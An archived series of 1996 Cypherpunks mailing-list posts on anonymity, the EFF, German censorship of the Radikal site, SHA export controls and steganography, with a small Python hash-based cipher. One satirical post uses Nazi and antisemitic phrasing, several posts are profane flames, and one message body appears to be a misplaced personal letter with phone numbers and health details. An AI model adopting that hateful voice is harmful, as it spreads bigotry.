white image rather than a color one? 3) Are there any tools at the moment to expose (not crack) the hidden encrypted data? If none. are there tools in development? If this appears twice please accept my apologies. I didn't see the first posting and so I assumed it was lost in transit. Please email replies to me directly if this is off-topic. Thank you. Makofi From aba at dcs.ex.ac.uk Thu Sep 5 15:34:59 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Fri, 6 Sep 1996 06:34:59 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609042341.QAA14459@eff.org> Message-ID: <199609051650.RAA00376@server.test.net> Stanton McCandlish writes on cpunks: > Adam Back typed: > > > > No. But I too am rather suprised to hear an EFF board member > > apparently speaking against free speech. OK, so maybe she was > > mis-quoted so I wait for her rebuttal, but nope, she basically to my > > reading reiterates nothing but negative opinions on free speech and > > anonymity. > > > > Tim's quotes of her CFP speech further demonstrates her leanings. > > I've talked to her personally about this. She's not thinking along those > lines, she just perceives a potential problem in the > accountability/ethics area, and is wondering how that can be solved, it can't, > if it can be solved, and what the price of such a solution is. the price for removing anonymity is the price of loosing strongly free speech (you know real free speech, as opposed to `free speech' where you can say what you want provided you provide your ID up front to the thought police, just in case at some future date you say something that someone somewhere in some region of the world finds mildly objectionable). The draconian measures necessary to even start also involve GAK, outlawing of non-GAKed crypto, placing import restrictions on crypto (I saw Freeh quoted as saying that restricting crypto imports may be necessary recently, something I predicted some years ago) draconian thought police laws, and so on. It's quite simple to envisage: place yourself in the position of the overzealous law enforcement type, imagine you are tasked with elminating encryption, free speech on the internet, anonymity. So what're you going do? First thing you might notice is that pretty near everyone is against you. So you work up a few four horseman scare stories, try to squelch all the first ammendment based challenges in the courts, do a few oblique trade-offs with companies exchanging key escrow for more bits, maybe blow up a few airplanes, and federal buildings and blame it on `militias', and the Internet. Rant about the Internet at each opportunity whether has anything to do with it or not (did the perps even know anyone with internet access, do they have a distant cousin who does, there must be an angle somewhere, or heck who cares, just shout about the Internet anyway, no one'll notice it's nothing to do with it). You realise that you're going to have to get pretty mean to actually stamp out free speech for all these people with a quaint wish to uphold the constitution, and protect their freedoms. Russia just about managed it for a while but they shot about 1 in 10 people in the process, they had licenses to own a photocopier, a typewriter, samples had to be provided to the KGB. > Honest, she's not *advocating* restrictions on anonymity, just > asking if any are necessary, no, they are not > in who's opinion, mine, most cpunks, yours? the rest of the EFF board? > with what rationale, at what cost, and by what mechanism. rationale above: the alternative loss of freedoms is too costly, look at Singapore's example. > > Lets put it this way: if Louis Freeh offered to be an EFF board > > member, would you take him on board? If he seemed quite > > Highly unlikely. Who gets to be a boardmember is decided by a board vote. > Freeh's anti-freedom history, and his obnoxious nature would, in my > guesstimate, give him less that a .0000000000001% chance of ever making > it onto the EFF board. And that's being nice. :) > > Dyson has no such history, and does have a history of careful thought > (even if disagreed with by quite a few people) about networks, online > commerce, negative effects of regulation, and civil liberties issues. > More the former 3 than the latter 1. So it seems. If she has little to say on civil liberties, perhaps she should refrain. William Geiger corrected me in this thread, his reading is that Dyson's interview was not a personal interview, she was being interviewd _as_ an EFF board member, she just chose to make a personal statement in it. If this is the case I submit the correct comment on her part would have been that the EFF had no current position on the topic. > > pro-anonymity, and free speech, and later turned out to be having > > doubts, would you keep him? > > I'll generalize that to "if you had any boardmember who expressed doubts > about the value of free speech and privacy, would the board keep them?" > I think not. But Esther's taken no such position. She's asking questions > about the mechanics of a system, and the effects of the system on society. > These are valid questions. It'd be helpful to see some short > Cypherpunks-generated answers, if they are available. Stuff about > reputational systems, etc. Personally I think I'm better at coding, than constructing convincing arguments. But for what it's worth here's a few. I doubt they are news to you, but since you kind of asked: Tim's cyphernomicon isn't short but should be a required reading, IMO. The US constitutional protections for free speech? The Singaporean demonstration of the alternative? The principle of having laws against crimes, not against the potential means of comitting crimes. You know, you can't carry a knife, why not? Because you might commit a crime. So why not wait see if you do commit a crime. You could just as easily stab someone with a screw driver, so what now, outlaw carrying of screw drivers, have permits to carry a screw driver? Sad fact is you can probably get successfully prosecuted for carrying a screw driver if you can't demonstrate a need to carry one already. You see where this line of reasoning heads. It is ultimately useless to make it illegal for people to have any means to commit crimes. Crimes with victims are already illegal, we don't need anymore laws, we've got way too many already. If someone goes out and murders someone, the police attempt to catch the murderer to prevent further murders. We don't need dumb laws outlawing cars (so the guy can't drive away from the scene?), knives, guns, the internet (in case he plots to off someone), the phone system in case he uses that, pay phones in case he uses one of those, what comes next, you know? Several things which were proposed in jest by cypherpunks which were thought too outlandish to be next in line for banning, were actually seriously proposed and even implemented. It never ceases to amaze me the things the law enforcement types think up. Perhaps when the technology is up to it we ought to just implant a CCD chip behind newborn's eyeballs, and have a life escrow system to just record ever last second of everyones existance just in case they have the urge to drive over 55, or not divulge their true name, social security number, address etc. in a casual electronic conversation. > Just to be clear: There is no disagreement on the board, or the staff, of > EFF that anonymity is a vital component of privacy. yay :-) Now all you need to do is have an official policy that says so, so that board members who are less clear on the subject, can quote that policy rather than discussing their own opinions :-) Guess I've said all that I can on this sub-thread, so I'll leave you to continue with important EFF work, trying to knock down all those son of CDAs the individual states are even now crafting, Adam -- #!/bin/perl -sp0777i Message-ID: <9609051711.AA06484@etna.ai.mit.edu> >as are the Dworkin/MacKinnon-inspired anti-pornography laws which >Canada uses to censor lesbian bookstores and gay magazines. >For the most part, other than sex and drugs, Somewhat ironic that the first material to be banned under the law was by MacKinnon. Meanwhile Dworkin has no credebility at all, in addition to her "anti-porn" crusading activities she has a line writing sado-masochistic erotica. >Mark openly violates the >censorship laws, and his shop occasionally gets raided, and after >the last bust they've decided he's a co-conspirator with everybody >who's grown drugs using seeds or light bulbs bought from him, >and they're playing a FUD game about whether to charge him >with 8 life sentences, in under-5-year pieces....) There are equally bad cases in Texas. Two brothers who ran a hydroponics equipment store got jailed on "conspiracy" charges. There are problems in Canada, no doubt. I was simply pointing out that the Teal case is a bad example. The Zundel case is a much more apprpriate one. Phill From flengyel at dorsai.org Fri Sep 6 01:35:21 1996 From: flengyel at dorsai.org (Florian Lengyel) Date: Fri, 6 Sep 1996 16:35:21 +0800 Subject: up In-Reply-To: Message-ID: <322F0FDC.1682@dorsai.org> Rebecca L Madden wrote: > > it's three o four. > I'm up. > > Becky Madden > #(412)-862-2934 Given the opportunity to construe something the wrong way, I will. I take it this means we should call you now. F Lengyel flengyel at dorsai.org http://www.dorsai.org/~flengyel > > //<@>\\*//<@>\\*//<@>\\*//<@>\\*//<@>\\*//<@>\\ > > I believe that imagination is stronger than knowledge- > That myth is more potent than history. > I believe that dreams are more powerful than facts- > That hope always triumphs over experience- > That laughter is the only cure for grief. > And I believe that love is stronger than death. > > -Robert Fulghum From grafolog at netcom.com Fri Sep 6 01:43:53 1996 From: grafolog at netcom.com (jonathon) Date: Fri, 6 Sep 1996 16:43:53 +0800 Subject: Race Bit: C In-Reply-To: <199609050630.AAA07395@zifi.genetics.utah.edu> Message-ID: On Thu, 5 Sep 1996, Anonymous wrote: > defunded 100%, IMO). Violence begats violence which begats even larger > government, don't start us on that road -- leave me in peace. If I understand you correctly, it is OK for a government to institute violence against the residents of the land it claims dominion over, but it is not acceptable for the inhabitants of that piece of land to respond in self defence. xan jonathon grafolog at netcom.com However, if you're tired of the Lesser of N evils, Cthulu's export policy is that you can't escape anyway, and your puny mortal lives will be absorbed along with his morning coffee. Your encryption technology is futile against the Elder Gods, and the arcane formulas in the Cyphernomicon of that mad physicist Tim The Enchanter may summon spirits from the vasty deep, but no secrets are safe from Nyarla-S-Ahothep who knows all and sees all. Bill Stewart From nobody at replay.com Fri Sep 6 02:08:18 1996 From: nobody at replay.com (Anonymous) Date: Fri, 6 Sep 1996 17:08:18 +0800 Subject: Tack of Internet censorship Message-ID: <199609051526.RAA18328@basement.replay.com> Six months ago, the Internet censors and Exon wannabees took the tack of "the Internet is too hard to censor". Now, their motto is "There will be some who get around our censorship, but we will try anyway." Unfortunately, I believe these censorship strikes will keep happening unless we find a way to stalemate them. What I am proposing is that Apache or other WWW servers have a way to allow access to site B's URL at site A, similar to the old trick of finger user at sitea.com@siteb.com. Implementation should be simple. However, I wonder what is a good standard way to specify this in the URL or a site. From schmidt at pin.de Fri Sep 6 02:26:31 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Fri, 6 Sep 1996 17:26:31 +0800 Subject: FWD: Another try to kill democracy In-Reply-To: <322EA63D.35B5@stadt.com> Message-ID: > No problem in gaining access so far. I even traces through Telekom and > C-Serve - no trace of restrictions. > > Maybe just a way to generate traffic to a lame site? > Definetly not. There is an advisory from the Generalbundesanwaltschaft and the ICTF that ISPs should ('have to') restrict the access to those urls. But so far nothing happend. I asked some people to try the urls and there where no restrictions. (I encounterd no restrictions myself.) -stephan From Kevin.L.Prigge-2 at tc.umn.edu Fri Sep 6 02:37:01 1996 From: Kevin.L.Prigge-2 at tc.umn.edu (Kevin L Prigge) Date: Fri, 6 Sep 1996 17:37:01 +0800 Subject: Anonymity (re: the Esther Dyson issue) In-Reply-To: <9609042054.AB16740@anchor.ho.att.com> Message-ID: <322eea225b5e002@noc.tc.umn.edu> stewarts at IX.NETCOM.COM said: > In Tim's Cyphernomicon, he says > - I have heard (no cites) that "going masked for the purpose > of going masked" is illegal in many jurisdictions. Hard to > believe, as many other disguises are just as effective and > are presumably not outlawed (wigs, mustaches, makeup, > etc.). I assume the law has to do with people wearning ski > masks and such in "inappropriate" places. Bad law, if real. > > A lot of the motivation was to stop the Ku Klux Klan terrorism. > On the other hand, the reason it was mentioned on the list a couple > years ago was that a woman was arrested in some North Central city, > probably Detroit, for violating it, because she was wearing a > Middle-Eastern-style chador outfit that covered her face. > That would be St Paul, MN. If I recall, the arrest was thrown out (and possibly the law overturned). I can look for references if anyone cares. -- Kevin L. Prigge | "I rarely saw people sitting at Systems Software Programmer | computers producing real code Internet Enterprise - OIT | wearing ties." - Philippe Kahn University of Minnesota | (speech at Software Development '90) From paul at fatmans.demon.co.uk Fri Sep 6 02:39:22 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Fri, 6 Sep 1996 17:39:22 +0800 Subject: their is a new mailing list Message-ID: <841932721.22517.0@fatmans.demon.co.uk> Some crazy fucker wrote: > > their is a new mailing list for all you hackers just email your name or > > handle and e-mail address and youll be subscribed > > send information to hack5 at juno.com Listen motherfucker. I`m going to say this once and for all... this list is not about hacking, not about "me too" messages, it is about cryptography, the tecnical and ethical sides. if you want to post shit like this do it on alt.2600 and let me tell you they will flame you for it there too, and quite rightly, I think I speak for us all when I say RTFM. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From declan at eff.org Fri Sep 6 02:55:21 1996 From: declan at eff.org (Declan McCullagh) Date: Fri, 6 Sep 1996 17:55:21 +0800 Subject: FWD: Another try to kill democracy In-Reply-To: <322EA63D.35B5@stadt.com> Message-ID: That was my first thought, but it appears the ban is being implemented, albeit slowly. Check out my message of about 12 hours ago on the topic. -Declan On Thu, 5 Sep 1996, D. Moeller wrote: > James A. Donald wrote: > > > > At 09:53 PM 9/2/96 +0000, SPG wrote: > > > I just got wind that the German government is planning to force german > > > ISP's to shut off access to my ISP, XS4ALL, because the german magazine > > >'Radikal' has a web page on xs4all. > > <..> > > > How serious is this threat? > > No problem in gaining access so far. I even traces through Telekom and > C-Serve - no trace of restrictions. > > Maybe just a way to generate traffic to a lame site? > > Cheers Moe! > -- > > D. Moeller at WebLab U-Agency GmbH > webadmin at stadt.com http://www.stadt.com/u-agency/ > moe-san at elcafe.com http://www.elcafe.com/~moe-san/ > // declan at eff.org // I do not represent the EFF // declan at well.com // From paul at fatmans.demon.co.uk Fri Sep 6 02:57:44 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Fri, 6 Sep 1996 17:57:44 +0800 Subject: Voting Monarchist? Message-ID: <841932727.22534.0@fatmans.demon.co.uk> > ! Harry Brone is a fucking statist. If he weren't, he wouldn't be running > ! for president. Anyone who doesn't advocate killing all kings, presidents, > ! and prime ministers is a fucking statist and should be beaten to a pulp > ! with a rattan stick. Yeah, and anyone who dosen`t advocate random street searches, public floggings and legislation to make the eating of asparagus for breakfast law is a raving leftist militant cyberterrorist neon lighting, macdonalds working, fudge packing, bad ass dude with an attitude... have a nice day motherfucker Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From makof at alias.cyberpass.net Fri Sep 6 03:22:36 1996 From: makof at alias.cyberpass.net (makofi) Date: Fri, 6 Sep 1996 18:22:36 +0800 Subject: Steganography -- Tell-tale signs? Message-ID: <199609051651.JAA06856@sirius.infonex.com> Hi there! I'd appreciate some help from you experts in steganography. 1) If I hide some PGP encrypted data in a gif, jpg or wav file will there be any tell tale signs to the naked eye of an expert? If yes, what are they? 2) Would it better to hide the data in a jpg with black and white image rather than a color one? 3) Are there any tools at the moment to expose (not crack) the hidden encrypted data? If none. are there tools in development? If this appears twice please accept my apologies. I didn't see the first posting and so I assumed it was lost in transit. Please email replies to me directly if this is off-topic. Thank you. Makofi From frantz at netcom.com Fri Sep 6 03:46:49 1996 From: frantz at netcom.com (Bill Frantz) Date: Fri, 6 Sep 1996 18:46:49 +0800 Subject: rc2 export limits.. Message-ID: <199609060629.XAA27790@netcom6.netcom.com> At 9:23 AM 9/5/96 -0400, P. J. Ponder wrote: >The FIPS Pub (?180? ?181?) for the Secure Hash Algorithm (SHA) states in >the fine print at the beginning that SHA is export controlled. I don't >have the document to refer to right now, but it plainly states that SHA >falls under ITAR. As a cryptographic hash function, why would it be >controlled in this way? > >How can I use SHA to encrypt something for someone else to decrypt? I >know how to use it for authentication; am I missing something here? Any secure hash can be used as a stream cypher. Concatenate your key and a block serial number (never to be reused) to get a number to exclusive or with the plain text. When you need a new block, use the next sequential serial number. (See Applied Cryptography) Raw SHA probably isn't exportable because people can use it for crypto. If your use of SHA was bundled into a OS password scheme, you could probably get a CJ on it and export it. ------------------------------------------------------------------------- Bill Frantz | "Lone Star" - My personal | Periwinkle -- Consulting (408)356-8506 | choice for best movie of | 16345 Englewood Ave. frantz at netcom.com | 1996 | Los Gatos, CA 95032, USA From schmidt at pin.de Fri Sep 6 03:52:31 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Fri, 6 Sep 1996 18:52:31 +0800 Subject: German prosecutors redouble attack on Net, subversive leftists In-Reply-To: <322E94B9.41C67EA6@systemics.com> Message-ID: > I wonder how they are doing this? We know that the Germans allow full There is an advisory around where the ISPs say that they think it's not possible to block urls. And even if they figure a way out to do this, this mailing list proves (mirrors) that it's not possible to stop the flow of information. But the German Government doesn't seem to even understand a bit how the inet works. > this would increase the size of the blacklist that the Germans must use, The Germans. I don't like this evil German bashing. (which is quite obvios in some mails, although I think not in this one, but I had to say this) Some of us (some may say most, I'm not) are quite normal and there are even some cypherpunks around :) And as there are lots of ISPs in Germany (as in every other country) they won't get everyone to resctrict the access to some pages. -stephan From perry at piermont.com Fri Sep 6 03:59:18 1996 From: perry at piermont.com (Perry E. Metzger) Date: Fri, 6 Sep 1996 18:59:18 +0800 Subject: rc2 export limits.. In-Reply-To: Message-ID: <199609051547.LAA07458@jekyll.piermont.com> "P. J. Ponder" writes: > The FIPS Pub (?180? ?181?) for the Secure Hash Algorithm (SHA) states in > the fine print at the beginning that SHA is export controlled. I don't > have the document to refer to right now, but it plainly states that SHA > falls under ITAR. As a cryptographic hash function, why would it be > controlled in this way? Because the feds aren't stupid -- they know you can use any good hash algorithm as the core for a block cipher. Perry From jimbell at pacifier.com Fri Sep 6 04:01:27 1996 From: jimbell at pacifier.com (jim bell) Date: Fri, 6 Sep 1996 19:01:27 +0800 Subject: Herr Schmidt Message-ID: <199609052021.NAA29277@mail.pacifier.com> At 10:07 AM 9/5/96 -0700, Timothy C. May wrote: >By the way, I used the name "Schmidt" in my satire post, sent out earlier >this morning. I picked that name randomly, being a common German name >(cognate to Smith, I believe), and meant nothing with regard to Stephan. > >(I also don't dislike Germans in general. I studied some German in high >school--don't ask me to use it, though!--and have visited Germany. They >just have a certain well-known tendency to take the authoritarian path at >times.) >--Tim "Once all the Germans were warlike and mean But that couldn't happen again. We taught them a lesson in 1918... And they've hardly bothered us since then!" Tom Lehrer, "MLF Lullaby" Jim Bell jimbell at pacifier.com From andrew_loewenstern at il.us.swissbank.com Fri Sep 6 04:01:36 1996 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 6 Sep 1996 19:01:36 +0800 Subject: Message Digest Ciphers (was Re: rc2 export limits..) In-Reply-To: Message-ID: <9609051609.AA00717@ch1d157nwk> P J Ponder writes: > How can I use SHA to encrypt something for someone else to > decrypt? I know how to use it for authentication; am I missing > something here? Check Applied Cryptography for info on ciphers such as "Karn", "Luby-Rackoff", and "MDC" ... These are encryption algorithms that use one-way hashes as their block functions. Attached is a version of the Karn cipher I implemented as an export-a-crypt-system .sig a while back... I used python because it's my favorite language and has MD5 built-in. I implemented the Karn cipher since it was the simplest (and therefore shortest) of the MD ciphers, not because it's the most secure. andrew #!/usr/local/bin/python -- -export-a-crypt-system MD5 CBC-mode Karn Cipher from md5 import *;from sys import *;from string import *;M=md5;il=ir=M(argv[3]\ ).digest();ki=M(argv[2]).digest();K,k=ki[:8],ki[8:];p=stdin.read(32);c={'-e':'\ l=x(l,il);r=x(r,ir);R=x(M(l+K).digest(),r);L=x(M(R+k).digest(),l);il=L;ir=R','\ -d':'L=x(M(r+k).digest(),l);R=x(M(L+K).digest(),r);L=x(L,il);R=x(R,ir);ir=r;il\ =l'};main="def x(a,b):return joinfields(map(lambda m,n:chr(m^n),map(lambda m:o\ rd(m),a),map(lambda m:ord(m),b)),'');\nwhile(p):p=ljust(p,32);l,r=p[:16],p[16:\ ];exec(c[argv[1]]);stdout.write(L+R);p=stdin.read(32)";exec(main) #try: echo 'TESTING 1 2 3' | karn -e 'key' 'I-V' | karn -d 'key' 'I-V' From adam at homeport.org Fri Sep 6 04:04:22 1996 From: adam at homeport.org (Adam Shostack) Date: Fri, 6 Sep 1996 19:04:22 +0800 Subject: GAK by TIS In-Reply-To: <199608302326.XAA02261@pipe2.t1.usa.pipeline.com> Message-ID: <199609060148.UAA03173@homeport.org> To the editor, Its important to note that the Clinton administration has not vowed to end export restrictions on key escrowed products. The administration has agreed to let out relatively weak 64 bit products, if they are escrowed. This is far below the minimum key length of 80 bits recommended by Schneier, Rivest, Blaze, et al. (To be fair, this is noted deep inside the article.) The Clinton administration seems to expect overseas business to buy software with the spying functions built in and publicized. It is more likely that US software companies will continue to suffer until such time as the administration realizes that strong crypto is not only not going to disappear, but flourish as it enables online commerce. Adam Shostack | Network World, August 26, 1996, Page 1 | Key-escrow firewall ready to leave the country | | by Ellen Messner, Washington D.C. | | | After months of talk about exporting encryption software, | there will finally be action. | | Fulfilling the Clinton Administration's vow to end export | restrictions on strong encryption products if they use | key-escrow features, the U.S. government this week is | expected to permit Trusted Information Systems, Inc. | (TIS) to sell its Data Encryption Standard (DES)-equipped | Gauntlet firewall overseas. From amnesia at chardos.connix.com Fri Sep 6 04:05:21 1996 From: amnesia at chardos.connix.com (Anonymous) Date: Fri, 6 Sep 1996 19:05:21 +0800 Subject: No Subject Message-ID: <199609052210.SAA11602@chardos.connix.com> On 5 Sep 96 at 0:30, Anonymous, a man with a double standard wrote: > For them, I would go to jail; for you, I would even cooperate > with the BATF (which should be defunded 100%, IMO). Why would you go to jail? Who made jails? Who would use violence to bring you in? jfa From whgiii at amaranth.com Fri Sep 6 04:05:29 1996 From: whgiii at amaranth.com (William H. Geiger III) Date: Fri, 6 Sep 1996 19:05:29 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: <199609051915.OAA03527@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- HI FOUND THE NOTICE ABOUT IMMIGRATION AND NATURALIZATION SERVICE (INS) JOBS! THEY ARE RECRUITING FOR APPROXIMATELY 1500 ADMINISTRATIVE AND SUPPORT STAFF TO BE HIRED AND ON-BOARD BY SEPTEMBER 30, 96. TYPES OF POSITIONS: IMMIGRATION INFORMATION OFFICERS ADMINISTRATIVE AND SUPPORT STAFF DEPORTATION CLERK INVESTIGATIVE ASSISTANTS IMMIGRATION STATUS VERIFIER IMMIGRATION RECORDS TECHNICIAN APPLICATION CLERKS MOTOR VEHICLE OPERATOR AUTOMOTIVE MECHANICS FENCE REPAIRMAN LAW ENFORCEMENT COMMUNICATIONS ASSISTANT ELECTRONICS TECHNICIAN HEADQUARTERS PERSONNEL VACANCY HOTLINE: (202) 514-4711 (VIRGINIA, WASHINGTON DC) ADMINSTRATIVE CENTER, BURLINTON, VT: (902) 660-1116 (CT, DE, ME, MD, MA, NJ, NY, PA, PUERTO RICO, VT, WV) ADMINISTRATIVE CENTER, DALLAS, TX: (214) 767-5884 (AL, AR, FL, GA, KY, LA, MS, NM, NC, OK, SC, TN, TX) ADMINISTRATIVE CENTER, TWIN CITIES, MN: (612) 725-3897 RECORDING (612) 725-3880 (CO, DENVER, ID, IL, IO, KS, MI, MN, MO, MT,NE, ND, OH, SD, UT, WI, WY) ADMINISTRATIVE CENTER, LAGUNA NIGUEL, CA: (714) 360-3058 (AL, AR, CA, HI, GUAM, NE, OR, WA) SORRY IT TOOK SO LONG TO FIND. THIS WAS ON OUR OCPM EASTERN REGION BBS MESSAGE 07-17-96, FROM JACKIE MCLEER, SUBJECT: DEPARTMENT OF JUSTICE RECRUITMENT. I GUESS YOU HAVE HEARD BY NOW THAT PLANS FOR REGIONIZATION HAS BEEN PUT ON HOLD DO TO LACK OF MONEY. THEY SAY WE WON'T BE GOING ANY WHERE OR DOING ANY THING UNTIL AT LEAST 1999. THERE IS TALK OF A RIF HERE! 50 PEOPLE THIS YEAR (97) AND 50 THE NEXT TWO YEARS(98 & 99). WE HAVE TO BE DOWN TO 160 BY THE YEAR 2000. I THINK MY JOB IS SAFE, THEY CAN'T GET THE WORK DONE NOW WITH 12 PERSONNEL ACTIONS CLERK I CAN'T SEE THEM DOING IT WITH LESS. DID YOU HAVE A NICE HOLIDAY? DO ANYTHING SPECIAL? WE HAD RAIN ALL FOUR DAYS - (I HAD TAKEN OFF FRIDAY) - BUT IT WAS GREAT JUST NOT BEING AT WORK! I HAD BILL'S BIRTHDAY PRESENT DELIVERED EARLY (SEPT 18 IS HIS B'DAY). I GOT HIM A TV HE COULD SEE WITHOUT SITTING ON TOP OF -- RCA 52 INCH PROSCAN. IT'S GREAT AND HE SEEMS TO REALLY LOVE IT. I DON'T WATCH ENOUGH TO MATTER, BUT IT IS NICE FOR MOVIES. SHELLY AND HER DAUGHTER LESLIE CAME OVER FRIDAY EVENING TO HAVE PIZZA AND WATCH A MOVIE. THEY LIKED IT TOO! HOPE THINGS ARE GOING BETTER THERE. MY JOB IS GOING OK FOR NOW BUT A LOT OF THIS IS MEDICATION. MY DOCTOR PUT ME ON SOMETHING AGAIN WHEN I SAW HIM LAST MONTH. BLOOD PRESSURE WAY UP AND STARTING TO FEEL LIKE I WOULD CRY ANY MINUTE OVER ANYTHING! I SEE HIM AGAIN SEPT 13 MAYBE HE'LL TELL ME EVERYTHINGS OK (HA!:) THATS ALL FOR NOW - ITS SOMEWHERE AROUND 4 AM AND I HAVE TO GET READY FOR WORK. HI TO HOLLY! LOVE YA! KATHY In , on 09/05/96 at 01:23 PM, Asgaard said: >On Wed, 4 Sep 1996, Declan McCullagh wrote: >> The German Generalbundesanwaltschaft (Chief Federal Prosecutor's >> office) has "advised" the Internet providers to block access to >> "Radikal" (http://www.xs4all.nl/~tank/radikal) is a publication >> from the radical left that is illegal in Germany, but not in >> the Netherlands. >This is amazing. Without defending the German stand on the Revisionist >crap, that part is at least understandable in a historical context >(their sense of guilt for the unfortunate developments in the 30's >and 40's etc). But a quick overview of the contents of Radikal gives the >impression of an ordinary leftist zine, defining the outlawing of it as >pure political censorship in a Western 'democracy'. I'm truly surprised. >Asgaard Is there an URL with a English version? I am always curious to see what governments think they should "protect" their citizens from. Thanks, - -- - ----------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting WebExplorer & Java Enhanced!!! Merlin Beta Test Site - WarpServer SMP Test Site Author of PGPMR2 - PGP Front End for MR/2 Ice Look for MR/2 Tips & Rexx Scripts Get Work Place Shell for Windows!! PGP & MR/2 the only way for secure e-mail. Finger whgiii at amaranth.com for PGP Key and other info - ----------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMi8ubY9Co1n+aLhhAQEA2AP+N9svCUkXskUhLE3AQ/O1EyaqAPQS5CKm jAqKfnPjfTwFYxdZyE/XPrL+K877JTL1R6aDSN+cHb+YsmOQES4Zxj9AyshZbM1h 5P9Yw7448JUNp/ve4kdBkVJ1e+/+PuojKqnqmET1+a4uCywi3tG4D5XIN1jOFNsX 4ReMh+U5XkU= =Gr7I -----END PGP SIGNATURE----- From pjn at nworks.com Fri Sep 6 04:10:22 1996 From: pjn at nworks.com (pjn at nworks.com) Date: Fri, 6 Sep 1996 19:10:22 +0800 Subject: Message-ID: In> what do you know about hackers More than you appariently... P.J. pjn at nworks.com ... Nothing is opened more often by mistake than YOUR mouth. ___ Blue Wave/QWK v2.20 [NR] From makof at alias.cyberpass.net Fri Sep 6 04:12:50 1996 From: makof at alias.cyberpass.net (makofi) Date: Fri, 6 Sep 1996 19:12:50 +0800 Subject: Steganography -- Tell-tale signs? Message-ID: <199609051650.JAA06725@sirius.infonex.com> Hi there! I'd appreciate some help from you experts in steganography. 1) If I hide some PGP encrypted data in a gif, jpg or wav file will there be any tell tale signs to the naked eye of an expert? If yes, what are they? 2) Would it better to hide the data in a jpg with black and white image rather than a color one? 3) Are there any tools at the moment to expose (not crack) the hidden encrypted data? If none. are there tools in development? If this appears twice please accept my apologies. I didn't see the first posting and so I assumed it was lost in transit. Please email replies to me directly if this is off-topic. Thank you. Makofi From wclerke at emirates.net.ae Fri Sep 6 04:15:29 1996 From: wclerke at emirates.net.ae (Wayne Clerke) Date: Fri, 6 Sep 1996 19:15:29 +0800 Subject: Using Compromised Remailers to Get the Goods Message-ID: <199609052137.BAA04432@ns2.emirates.net.ae> > From: Timothy C. May > To: cypherpunks at toad.com > Subject: Using Compromised Remailers to Get the Goods > Date: Thursday, 5 September 1996 8:28 < ... > > (For example, full sender untraceablility means that sources within police > departments can go home, log on with the own PCs, and sell information > about pending investigations, modulo their concerns about pointing to > themselves with information provided (see "canary traps"). Heh ... is this a 'whistle-SUCKER'? :-) > > --Tim May > EMail: wclerke at emirates.net.ae PGP key ID: AEB2546D FP: D663D11E DA19D74F 5032DC7E E001B702 PGP mail welcome. Voice: +971 506 43 48 53 Wayne Clerke If you're not living on the edge, you're taking up too much space. From tcmay at got.net Fri Sep 6 04:15:48 1996 From: tcmay at got.net (Timothy C. May) Date: Fri, 6 Sep 1996 19:15:48 +0800 Subject: ... subversive leftists Message-ID: At 11:23 AM 9/5/96, Asgaard wrote: >On Wed, 4 Sep 1996, Declan McCullagh wrote: > >> The German Generalbundesanwaltschaft (Chief Federal Prosecutor's >> office) has "advised" the Internet providers to block access to > >> "Radikal" (http://www.xs4all.nl/~tank/radikal) is a publication >> from the radical left that is illegal in Germany, but not in >> the Netherlands. > >This is amazing. Without defending the German stand on the Revisionist >crap, that part is at least understandable in a historical context >(their sense of guilt for the unfortunate developments in the 30's >and 40's etc). But a quick overview of the contents of Radikal gives the >impression of an ordinary leftist zine, defining the outlawing of it as >pure political censorship in a Western 'democracy'. I'm truly surprised. Leftists are despicable. They steal our money, they corrupt our politics, they nationalized our industries, they subvert our ideals, and they undermine our national will. The Democratic People's German Reich is fully justified in cutting off contacts with subversive radical publications in Jew-dominated nations like Holland. As Reichskommander Schmidt points out: "The citizen-units who access foreign Web sites will be rounded up and disposed of like the vermin they are. We cannot allow the Revisionists and Leftists to triumph. We will send them to the showers." Heil Freeh! --Klaus From nobody at zifi.genetics.utah.edu Fri Sep 6 04:20:26 1996 From: nobody at zifi.genetics.utah.edu (Anonymous) Date: Fri, 6 Sep 1996 19:20:26 +0800 Subject: Subject: Re: Race Bit: C Message-ID: <199609052031.OAA10096@zifi.genetics.utah.edu> No need to send to :Anonymous But since you did >Cc: cypherpunks at toad.com saying ... > If I understand you correctly, it is OK for a government to > institute violence against the residents of the land it claims > dominion over, but it is not acceptable for the inhabitants of > that piece of land to respond in self defence. I will say this: No, government initiation of violence (such as in Waco, Ruby Ridge, etc.) is not OK, and AsPol initiation of violence is not either. This can lead into a long argument about just _when_ 